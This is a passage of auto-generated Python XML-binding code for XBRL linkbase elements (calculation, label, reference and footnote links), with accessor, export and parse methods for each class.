for loc_ in self.loc:
loc_.export(outfile, level, namespace_='link:', name_='loc', pretty_print=pretty_print)
for definitionArc_ in self.definitionArc:
definitionArc_.export(outfile, level, namespace_='link:', name_='definitionArc', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
self.anyAttributes_ = {}
for name, value in attrs.items():
if name not in already_processed:
self.anyAttributes_[name] = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'title':
type_name_ = child_.attrib.get(
'{http://www.w3.org/2001/XMLSchema-instance}type')
if type_name_ is None:
type_name_ = child_.attrib.get('type')
if type_name_ is not None:
type_names_ = type_name_.split(':')
if len(type_names_) == 1:
type_name_ = type_names_[0]
else:
type_name_ = type_names_[1]
class_ = globals()[type_name_]
obj_ = class_.factory()
obj_.build(child_)
else:
raise NotImplementedError(
'Class not implemented for <title> element')
self.title.append(obj_)
obj_.original_tagname_ = 'title'
elif nodeName_ == 'documentation':
type_name_ = child_.attrib.get(
'{http://www.w3.org/2001/XMLSchema-instance}type')
if type_name_ is None:
type_name_ = child_.attrib.get('type')
if type_name_ is not None:
type_names_ = type_name_.split(':')
if len(type_names_) == 1:
type_name_ = type_names_[0]
else:
type_name_ = type_names_[1]
class_ = globals()[type_name_]
obj_ = class_.factory()
obj_.build(child_)
else:
raise NotImplementedError(
'Class not implemented for <documentation> element')
self.documentation.append(obj_)
obj_.original_tagname_ = 'documentation'
elif nodeName_ == 'documentation':
obj_ = documentationType.factory()
obj_.build(child_)
self.documentation.append(obj_)
obj_.original_tagname_ = 'documentation'
elif nodeName_ == 'loc':
obj_ = locatorType.factory()
obj_.build(child_)
self.loc.append(obj_)
obj_.original_tagname_ = 'loc'
elif nodeName_ == 'definitionArc':
class_obj_ = self.get_class_obj_(child_, arcType)
obj_ = class_obj_.factory()
obj_.build(child_)
self.definitionArc.append(obj_)
obj_.original_tagname_ = 'definitionArc'
# end class definitionLink
class calculationLink(GeneratedsSuper):
"""calculation extended link element definition"""
subclass = None
superclass = None
def __init__(self, title=None, documentation=None, loc=None, calculationArc=None):
self.original_tagname_ = None
if title is None:
self.title = []
else:
self.title = title
if documentation is None:
self.documentation = []
else:
self.documentation = documentation
if loc is None:
self.loc = []
else:
self.loc = loc
if calculationArc is None:
self.calculationArc = []
else:
self.calculationArc = calculationArc
self.anyAttributes_ = {}
def factory(*args_, **kwargs_):
if calculationLink.subclass:
return calculationLink.subclass(*args_, **kwargs_)
else:
return calculationLink(*args_, **kwargs_)
factory = staticmethod(factory)
def get_title(self): return self.title
def set_title(self, title): self.title = title
def add_title(self, value): self.title.append(value)
def insert_title_at(self, index, value): self.title.insert(index, value)
def replace_title_at(self, index, value): self.title[index] = value
def get_documentation(self): return self.documentation
def set_documentation(self, documentation): self.documentation = documentation
def add_documentation(self, value): self.documentation.append(value)
def insert_documentation_at(self, index, value): self.documentation.insert(index, value)
def replace_documentation_at(self, index, value): self.documentation[index] = value
def get_loc(self): return self.loc
def set_loc(self, loc): self.loc = loc
def add_loc(self, value): self.loc.append(value)
def insert_loc_at(self, index, value): self.loc.insert(index, value)
def replace_loc_at(self, index, value): self.loc[index] = value
def get_calculationArc(self): return self.calculationArc
def set_calculationArc(self, calculationArc): self.calculationArc = calculationArc
def add_calculationArc(self, value): self.calculationArc.append(value)
def insert_calculationArc_at(self, index, value): self.calculationArc.insert(index, value)
def replace_calculationArc_at(self, index, value): self.calculationArc[index] = value
def get_anyAttributes_(self): return self.anyAttributes_
def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_
def hasContent_(self):
if (
self.title or
self.documentation or
self.loc or
self.calculationArc
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='calculationLink', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xl="http://www.xbrl.org/2003/XLink" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='calculationLink')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='calculationLink', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='calculationLink'):
unique_counter = 0
for name, value in self.anyAttributes_.items():
xsinamespaceprefix = 'xsi'
xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
xsinamespace2 = '{%s}' % (xsinamespace1, )
if name.startswith(xsinamespace2):
name1 = name[len(xsinamespace2):]
name2 = '%s:%s' % (xsinamespaceprefix, name1, )
if name2 not in already_processed:
already_processed.add(name2)
outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
else:
mo = re_.match(Namespace_extract_pat_, name)
if mo is not None:
namespace, name = mo.group(1, 2)
if name not in already_processed:
already_processed.add(name)
if namespace == 'http://www.w3.org/XML/1998/namespace':
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
else:
unique_counter += 1
outfile.write(' xmlns:%d="%s"' % (
unique_counter, namespace, ))
outfile.write(' %d:%s=%s' % (
unique_counter, name, quote_attrib(value), ))
else:
if name not in already_processed:
already_processed.add(name)
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
pass
def exportChildren(self, outfile, level, namespace_='finassist:', name_='calculationLink', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for title_ in self.title:
title_.export(outfile, level, namespace_, name_='title', pretty_print=pretty_print)
for documentation_ in self.documentation:
documentation_.export(outfile, level, namespace_, name_='documentation', pretty_print=pretty_print)
for loc_ in self.loc:
loc_.export(outfile, level, namespace_='link:', name_='loc', pretty_print=pretty_print)
for calculationArc_ in self.calculationArc:
calculationArc_.export(outfile, level, namespace_='link:', name_='calculationArc', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
self.anyAttributes_ = {}
for name, value in attrs.items():
if name not in already_processed:
self.anyAttributes_[name] = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'title':
type_name_ = child_.attrib.get(
'{http://www.w3.org/2001/XMLSchema-instance}type')
if type_name_ is None:
type_name_ = child_.attrib.get('type')
if type_name_ is not None:
type_names_ = type_name_.split(':')
if len(type_names_) == 1:
type_name_ = type_names_[0]
else:
type_name_ = type_names_[1]
class_ = globals()[type_name_]
obj_ = class_.factory()
obj_.build(child_)
else:
raise NotImplementedError(
'Class not implemented for <title> element')
self.title.append(obj_)
obj_.original_tagname_ = 'title'
elif nodeName_ == 'documentation':
type_name_ = child_.attrib.get(
'{http://www.w3.org/2001/XMLSchema-instance}type')
if type_name_ is None:
type_name_ = child_.attrib.get('type')
if type_name_ is not None:
type_names_ = type_name_.split(':')
if len(type_names_) == 1:
type_name_ = type_names_[0]
else:
type_name_ = type_names_[1]
class_ = globals()[type_name_]
obj_ = class_.factory()
obj_.build(child_)
else:
raise NotImplementedError(
'Class not implemented for <documentation> element')
self.documentation.append(obj_)
obj_.original_tagname_ = 'documentation'
elif nodeName_ == 'documentation':
obj_ = documentationType.factory()
obj_.build(child_)
self.documentation.append(obj_)
obj_.original_tagname_ = 'documentation'
elif nodeName_ == 'loc':
obj_ = locatorType.factory()
obj_.build(child_)
self.loc.append(obj_)
obj_.original_tagname_ = 'loc'
elif nodeName_ == 'calculationArc':
obj_ = calculationArc.factory()
obj_.build(child_)
self.calculationArc.append(obj_)
obj_.original_tagname_ = 'calculationArc'
# end class calculationLink
class labelLink(GeneratedsSuper):
"""label extended link element definition"""
subclass = None
superclass = None
def __init__(self, title=None, documentation=None, loc=None, labelArc=None, label=None):
self.original_tagname_ = None
if title is None:
self.title = []
else:
self.title = title
if documentation is None:
self.documentation = []
else:
self.documentation = documentation
if loc is None:
self.loc = []
else:
self.loc = loc
if labelArc is None:
self.labelArc = []
else:
self.labelArc = labelArc
if label is None:
self.label = []
else:
self.label = label
self.anyAttributes_ = {}
def factory(*args_, **kwargs_):
if labelLink.subclass:
return labelLink.subclass(*args_, **kwargs_)
else:
return labelLink(*args_, **kwargs_)
factory = staticmethod(factory)
def get_title(self): return self.title
def set_title(self, title): self.title = title
def add_title(self, value): self.title.append(value)
def insert_title_at(self, index, value): self.title.insert(index, value)
def replace_title_at(self, index, value): self.title[index] = value
def get_documentation(self): return self.documentation
def set_documentation(self, documentation): self.documentation = documentation
def add_documentation(self, value): self.documentation.append(value)
def insert_documentation_at(self, index, value): self.documentation.insert(index, value)
def replace_documentation_at(self, index, value): self.documentation[index] = value
def get_loc(self): return self.loc
def set_loc(self, loc): self.loc = loc
def add_loc(self, value): self.loc.append(value)
def insert_loc_at(self, index, value): self.loc.insert(index, value)
def replace_loc_at(self, index, value): self.loc[index] = value
def get_labelArc(self): return self.labelArc
def set_labelArc(self, labelArc): self.labelArc = labelArc
def add_labelArc(self, value): self.labelArc.append(value)
def insert_labelArc_at(self, index, value): self.labelArc.insert(index, value)
def replace_labelArc_at(self, index, value): self.labelArc[index] = value
def get_label(self): return self.label
def set_label(self, label): self.label = label
def add_label(self, value): self.label.append(value)
def insert_label_at(self, index, value): self.label.insert(index, value)
def replace_label_at(self, index, value): self.label[index] = value
def get_anyAttributes_(self): return self.anyAttributes_
def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_
def hasContent_(self):
if (
self.title or
self.documentation or
self.loc or
self.labelArc or
self.label
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='labelLink', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xl="http://www.xbrl.org/2003/XLink" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='labelLink')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='labelLink', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='labelLink'):
unique_counter = 0
for name, value in self.anyAttributes_.items():
xsinamespaceprefix = 'xsi'
xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
xsinamespace2 = '{%s}' % (xsinamespace1, )
if name.startswith(xsinamespace2):
name1 = name[len(xsinamespace2):]
name2 = '%s:%s' % (xsinamespaceprefix, name1, )
if name2 not in already_processed:
already_processed.add(name2)
outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
else:
mo = re_.match(Namespace_extract_pat_, name)
if mo is not None:
namespace, name = mo.group(1, 2)
if name not in already_processed:
already_processed.add(name)
if namespace == 'http://www.w3.org/XML/1998/namespace':
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
else:
unique_counter += 1
outfile.write(' xmlns:%d="%s"' % (
unique_counter, namespace, ))
outfile.write(' %d:%s=%s' % (
unique_counter, name, quote_attrib(value), ))
else:
if name not in already_processed:
already_processed.add(name)
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
pass
def exportChildren(self, outfile, level, namespace_='finassist:', name_='labelLink', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for title_ in self.title:
title_.export(outfile, level, namespace_, name_='title', pretty_print=pretty_print)
for documentation_ in self.documentation:
documentation_.export(outfile, level, namespace_, name_='documentation', pretty_print=pretty_print)
for loc_ in self.loc:
loc_.export(outfile, level, namespace_='link:', name_='loc', pretty_print=pretty_print)
for labelArc_ in self.labelArc:
labelArc_.export(outfile, level, namespace_='link:', name_='labelArc', pretty_print=pretty_print)
for label_ in self.label:
label_.export(outfile, level, namespace_='link:', name_='label', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
self.anyAttributes_ = {}
for name, value in attrs.items():
if name not in already_processed:
self.anyAttributes_[name] = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'title':
type_name_ = child_.attrib.get(
'{http://www.w3.org/2001/XMLSchema-instance}type')
if type_name_ is None:
type_name_ = child_.attrib.get('type')
if type_name_ is not None:
type_names_ = type_name_.split(':')
if len(type_names_) == 1:
type_name_ = type_names_[0]
else:
type_name_ = type_names_[1]
class_ = globals()[type_name_]
obj_ = class_.factory()
obj_.build(child_)
else:
raise NotImplementedError(
'Class not implemented for <title> element')
self.title.append(obj_)
obj_.original_tagname_ = 'title'
elif nodeName_ == 'documentation':
type_name_ = child_.attrib.get(
'{http://www.w3.org/2001/XMLSchema-instance}type')
if type_name_ is None:
type_name_ = child_.attrib.get('type')
if type_name_ is not None:
type_names_ = type_name_.split(':')
if len(type_names_) == 1:
type_name_ = type_names_[0]
else:
type_name_ = type_names_[1]
class_ = globals()[type_name_]
obj_ = class_.factory()
obj_.build(child_)
else:
raise NotImplementedError(
'Class not implemented for <documentation> element')
self.documentation.append(obj_)
obj_.original_tagname_ = 'documentation'
elif nodeName_ == 'documentation':
obj_ = documentationType.factory()
obj_.build(child_)
self.documentation.append(obj_)
obj_.original_tagname_ = 'documentation'
elif nodeName_ == 'loc':
obj_ = locatorType.factory()
obj_.build(child_)
self.loc.append(obj_)
obj_.original_tagname_ = 'loc'
elif nodeName_ == 'labelArc':
class_obj_ = self.get_class_obj_(child_, arcType)
obj_ = class_obj_.factory()
obj_.build(child_)
self.labelArc.append(obj_)
obj_.original_tagname_ = 'labelArc'
elif nodeName_ == 'label':
obj_ = label.factory()
obj_.build(child_)
self.label.append(obj_)
obj_.original_tagname_ = 'label'
# end class labelLink
class referenceLink(GeneratedsSuper):
"""reference extended link element definition"""
subclass = None
superclass = None
def __init__(self, title=None, documentation=None, loc=None, referenceArc=None, reference=None):
self.original_tagname_ = None
if title is None:
self.title = []
else:
self.title = title
if documentation is None:
self.documentation = []
else:
self.documentation = documentation
if loc is None:
self.loc = []
else:
self.loc = loc
if referenceArc is None:
self.referenceArc = []
else:
self.referenceArc = referenceArc
if reference is None:
self.reference = []
else:
self.reference = reference
self.anyAttributes_ = {}
def factory(*args_, **kwargs_):
if referenceLink.subclass:
return referenceLink.subclass(*args_, **kwargs_)
else:
return referenceLink(*args_, **kwargs_)
factory = staticmethod(factory)
def get_title(self): return self.title
def set_title(self, title): self.title = title
def add_title(self, value): self.title.append(value)
def insert_title_at(self, index, value): self.title.insert(index, value)
def replace_title_at(self, index, value): self.title[index] = value
def get_documentation(self): return self.documentation
def set_documentation(self, documentation): self.documentation = documentation
def add_documentation(self, value): self.documentation.append(value)
def insert_documentation_at(self, index, value): self.documentation.insert(index, value)
def replace_documentation_at(self, index, value): self.documentation[index] = value
def get_loc(self): return self.loc
def set_loc(self, loc): self.loc = loc
def add_loc(self, value): self.loc.append(value)
def insert_loc_at(self, index, value): self.loc.insert(index, value)
def replace_loc_at(self, index, value): self.loc[index] = value
def get_referenceArc(self): return self.referenceArc
def set_referenceArc(self, referenceArc): self.referenceArc = referenceArc
def add_referenceArc(self, value): self.referenceArc.append(value)
def insert_referenceArc_at(self, index, value): self.referenceArc.insert(index, value)
def replace_referenceArc_at(self, index, value): self.referenceArc[index] = value
def get_reference(self): return self.reference
def set_reference(self, reference): self.reference = reference
def add_reference(self, value): self.reference.append(value)
def insert_reference_at(self, index, value): self.reference.insert(index, value)
def replace_reference_at(self, index, value): self.reference[index] = value
def get_anyAttributes_(self): return self.anyAttributes_
def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_
def hasContent_(self):
if (
self.title or
self.documentation or
self.loc or
self.referenceArc or
self.reference
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='referenceLink', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xl="http://www.xbrl.org/2003/XLink" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='referenceLink')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='referenceLink', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='referenceLink'):
unique_counter = 0
for name, value in self.anyAttributes_.items():
xsinamespaceprefix = 'xsi'
xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
xsinamespace2 = '{%s}' % (xsinamespace1, )
if name.startswith(xsinamespace2):
name1 = name[len(xsinamespace2):]
name2 = '%s:%s' % (xsinamespaceprefix, name1, )
if name2 not in already_processed:
already_processed.add(name2)
outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
else:
mo = re_.match(Namespace_extract_pat_, name)
if mo is not None:
namespace, name = mo.group(1, 2)
if name not in already_processed:
already_processed.add(name)
if namespace == 'http://www.w3.org/XML/1998/namespace':
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
else:
unique_counter += 1
outfile.write(' xmlns:%d="%s"' % (
unique_counter, namespace, ))
outfile.write(' %d:%s=%s' % (
unique_counter, name, quote_attrib(value), ))
else:
if name not in already_processed:
already_processed.add(name)
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
pass
def exportChildren(self, outfile, level, namespace_='finassist:', name_='referenceLink', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for title_ in self.title:
title_.export(outfile, level, namespace_, name_='title', pretty_print=pretty_print)
for documentation_ in self.documentation:
documentation_.export(outfile, level, namespace_, name_='documentation', pretty_print=pretty_print)
for loc_ in self.loc:
loc_.export(outfile, level, namespace_='link:', name_='loc', pretty_print=pretty_print)
for referenceArc_ in self.referenceArc:
referenceArc_.export(outfile, level, namespace_='link:', name_='referenceArc', pretty_print=pretty_print)
for reference_ in self.reference:
reference_.export(outfile, level, namespace_='link:', name_='reference', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
self.anyAttributes_ = {}
for name, value in attrs.items():
if name not in already_processed:
self.anyAttributes_[name] = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'title':
type_name_ = child_.attrib.get(
'{http://www.w3.org/2001/XMLSchema-instance}type')
if type_name_ is None:
type_name_ = child_.attrib.get('type')
if type_name_ is not None:
type_names_ = type_name_.split(':')
if len(type_names_) == 1:
type_name_ = type_names_[0]
else:
type_name_ = type_names_[1]
class_ = globals()[type_name_]
obj_ = class_.factory()
obj_.build(child_)
else:
raise NotImplementedError(
'Class not implemented for <title> element')
self.title.append(obj_)
obj_.original_tagname_ = 'title'
elif nodeName_ == 'documentation':
type_name_ = child_.attrib.get(
'{http://www.w3.org/2001/XMLSchema-instance}type')
if type_name_ is None:
type_name_ = child_.attrib.get('type')
if type_name_ is not None:
type_names_ = type_name_.split(':')
if len(type_names_) == 1:
type_name_ = type_names_[0]
else:
type_name_ = type_names_[1]
class_ = globals()[type_name_]
obj_ = class_.factory()
obj_.build(child_)
else:
raise NotImplementedError(
'Class not implemented for <documentation> element')
self.documentation.append(obj_)
obj_.original_tagname_ = 'documentation'
elif nodeName_ == 'documentation':
obj_ = documentationType.factory()
obj_.build(child_)
self.documentation.append(obj_)
obj_.original_tagname_ = 'documentation'
elif nodeName_ == 'loc':
obj_ = locatorType.factory()
obj_.build(child_)
self.loc.append(obj_)
obj_.original_tagname_ = 'loc'
elif nodeName_ == 'referenceArc':
class_obj_ = self.get_class_obj_(child_, arcType)
obj_ = class_obj_.factory()
obj_.build(child_)
self.referenceArc.append(obj_)
obj_.original_tagname_ = 'referenceArc'
elif nodeName_ == 'reference':
obj_ = reference.factory()
obj_.build(child_)
self.reference.append(obj_)
obj_.original_tagname_ = 'reference'
# end class referenceLink
class footnoteLink(GeneratedsSuper):
"""footnote extended link element definition"""
subclass = None
superclass = None
def __init__(self, title=None, documentation=None, loc=None, footnoteArc=None, footnote=None):
self.original_tagname_ = None
if title is None:
self.title = []
else:
self.title = title
if documentation is None:
self.documentation = []
else:
self.documentation = documentation
if loc is None:
self.loc = []
else:
self.loc = loc
if footnoteArc is None:
self.footnoteArc = []
else:
self.footnoteArc = footnoteArc
if footnote is None:
self.footnote = []
else:
self.footnote = footnote
self.anyAttributes_ = {}
def factory(*args_, **kwargs_):
if footnoteLink.subclass:
return footnoteLink.subclass(*args_, **kwargs_)
else:
return footnoteLink(*args_, **kwargs_)
factory = staticmethod(factory)
def get_title(self): return self.title
def set_title(self, title): self.title = title
def add_title(self, value): self.title.append(value)
def insert_title_at(self, index, value): self.title.insert(index, value)
def replace_title_at(self, index, value): self.title[index] = value
def get_documentation(self): return self.documentation
def set_documentation(self, documentation): self.documentation = documentation
def add_documentation(self, value): self.documentation.append(value)
def insert_documentation_at(self, index, value): self.documentation.insert(index, value)
def replace_documentation_at(self, index, value): self.documentation[index] = value
def get_loc(self): return self.loc
def set_loc(self, loc): self.loc = loc
def add_loc(self, value): self.loc.append(value)
def insert_loc_at(self, index, value): self.loc.insert(index, value)
def replace_loc_at(self, index, value): self.loc[index] = value
def get_footnoteArc(self): return self.footnoteArc
def set_footnoteArc(self, footnoteArc): self.footnoteArc = footnoteArc
def add_footnoteArc(self, value): self.footnoteArc.append(value)
def insert_footnoteArc_at(self, index, value): self.footnoteArc.insert(index, value)
def replace_footnoteArc_at(self, index, value): self.footnoteArc[index] = value
def get_footnote(self): return self.footnote
def set_footnote(self, footnote): self.footnote = footnote
def add_footnote(self, value): self.footnote.append(value)
def insert_footnote_at(self, index, value): self.footnote.insert(index, value)
def replace_footnote_at(self, index, value): self.footnote[index] = value
def get_anyAttributes_(self): return self.anyAttributes_
def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_
def hasContent_(self):
if (
self.title or
self.documentation or
self.loc or
self.footnoteArc or
self.footnote
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='footnoteLink', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xl="http://www.xbrl.org/2003/XLink" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='footnoteLink')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='footnoteLink', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='footnoteLink'):
unique_counter = 0
for name, value in self.anyAttributes_.items():
xsinamespaceprefix = 'xsi'
xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
xsinamespace2 = '{%s}' % (xsinamespace1, )
if name.startswith(xsinamespace2):
name1 = name[len(xsinamespace2):]
name2 = '%s:%s' % (xsinamespaceprefix, name1, )
if name2 not in already_processed:
already_processed.add(name2)
outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
else:
mo = re_.match(Namespace_extract_pat_, name)
if mo is not None:
namespace, name = mo.group(1, 2)
if name not in already_processed:
already_processed.add(name)
if namespace == 'http://www.w3.org/XML/1998/namespace':
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
else:
unique_counter += 1
outfile.write(' xmlns:%d="%s"' % (
unique_counter, namespace, ))
outfile.write(' %d:%s=%s' % (
unique_counter, name, quote_attrib(value), ))
else:
if name not in already_processed:
already_processed.add(name)
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
pass
def exportChildren(self, outfile, level, namespace_='finassist:', name_='footnoteLink', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for title_ in self.title:
title_.export(outfile, level, namespace_, name_='title', pretty_print=pretty_print)
for documentation_ in self.documentation:
documentation_.export(outfile, level, namespace_, name_='documentation', pretty_print=pretty_print)
for loc_ in self.loc:
loc_.export(outfile, level, namespace_='link:', name_='loc', pretty_print=pretty_print)
for footnoteArc_ in self.footnoteArc:
footnoteArc_.export(outfile, level, namespace_='link:', name_='footnoteArc', pretty_print=pretty_print)
for footnote_ in self.footnote:
footnote_.export(outfile, level, namespace_='link:', name_='footnote', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
self.anyAttributes_ = {}
for name, value in attrs.items():
if name not in already_processed:
self.anyAttributes_[name] = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'title':
type_name_ = child_.attrib.get(
'{http://www.w3.org/2001/XMLSchema-instance}type')
if type_name_ is None:
type_name_ = child_.attrib.get('type')
if type_name_ is not None:
type_names_ = type_name_.split(':')
if len(type_names_) == 1:
type_name_ = type_names_[0]
else:
type_name_ = type_names_[1]
class_ = globals()[type_name_]
obj_ = class_.factory()
obj_.build(child_)
else:
raise NotImplementedError(
'Class not implemented for <title> element')
self.title.append(obj_)
obj_.original_tagname_ = 'title'
elif nodeName_ == 'documentation':
type_name_ = child_.attrib.get(
'{http://www.w3.org/2001/XMLSchema-instance}type')
if type_name_ is None:
type_name_ = child_.attrib.get('type')
if type_name_ is not None:
type_names_ = type_name_.split(':')
if len(type_names_) == 1:
type_name_ = type_names_[0]
else:
type_name_ = type_names_[1]
class_ = globals()[type_name_]
obj_ = class_.factory()
obj_.build(child_)
else:
raise NotImplementedError(
'Class not implemented for <documentation> element')
self.documentation.append(obj_)
obj_.original_tagname_ = 'documentation'
elif nodeName_ == 'documentation':
obj_ = documentationType.factory()
obj_.build(child_)
self.documentation.append(obj_)
obj_.original_tagname_ = 'documentation'
elif nodeName_ == 'loc':
obj_ = locatorType.factory()
obj_.build(child_)
self.loc.append(obj_)
obj_.original_tagname_ = 'loc'
elif nodeName_ == 'footnoteArc':
class_obj_ = self.get_class_obj_(child_, arcType)
obj_ = class_obj_.factory()
obj_.build(child_)
self.footnoteArc.append(obj_)
obj_.original_tagname_ = 'footnoteArc'
elif nodeName_ == 'footnote':
obj_ = footnote.factory()
obj_.build(child_)
self.footnote.append(obj_)
obj_.original_tagname_ = 'footnote'
# end class footnoteLink
class linkbase(GeneratedsSuper):
"""Definition of the linkbase element. Used to contain a set of zero or
more extended link elements."""
subclass = None
superclass = None
def __init__(self, id=None, documentation=None, roleRef=None, arcroleRef=None, extended=None):
self.original_tagname_ = None
self.id = _cast(None, id)
if documentation is None:
self.documentation = []
else:
self.documentation = documentation
if roleRef is None:
self.roleRef = []
else:
self.roleRef = roleRef
if arcroleRef is None:
self.arcroleRef = []
else:
self.arcroleRef = arcroleRef
if extended is None:
self.extended = []
else:
self.extended = extended
self.anyAttributes_ = {}
def factory(*args_, **kwargs_):
if linkbase.subclass:
return linkbase.subclass(*args_, **kwargs_)
else:
return linkbase(*args_, **kwargs_)
factory = staticmethod(factory)
def get_documentation(self): return self.documentation
def set_documentation(self, documentation): self.documentation = documentation
def add_documentation(self, value): self.documentation.append(value)
def insert_documentation_at(self, index, value): self.documentation.insert(index, value)
def replace_documentation_at(self, index, value): self.documentation[index] = value
def get_roleRef(self): return self.roleRef
def set_roleRef(self, roleRef): self.roleRef = roleRef
def add_roleRef(self, value): self.roleRef.append(value)
def insert_roleRef_at(self, index, value): self.roleRef.insert(index, value)
def replace_roleRef_at(self, index, value): self.roleRef[index] = value
def get_arcroleRef(self): return self.arcroleRef
def set_arcroleRef(self, arcroleRef): self.arcroleRef = arcroleRef
def add_arcroleRef(self, value): self.arcroleRef.append(value)
def insert_arcroleRef_at(self, index, value): self.arcroleRef.insert(index, value)
def replace_arcroleRef_at(self, index, value): self.arcroleRef[index] = value
def get_extended(self): return self.extended
def set_extended(self, extended): self.extended = extended
def add_extended(self, value): self.extended.append(value)
def insert_extended_at(self, index, value): self.extended.insert(index, value)
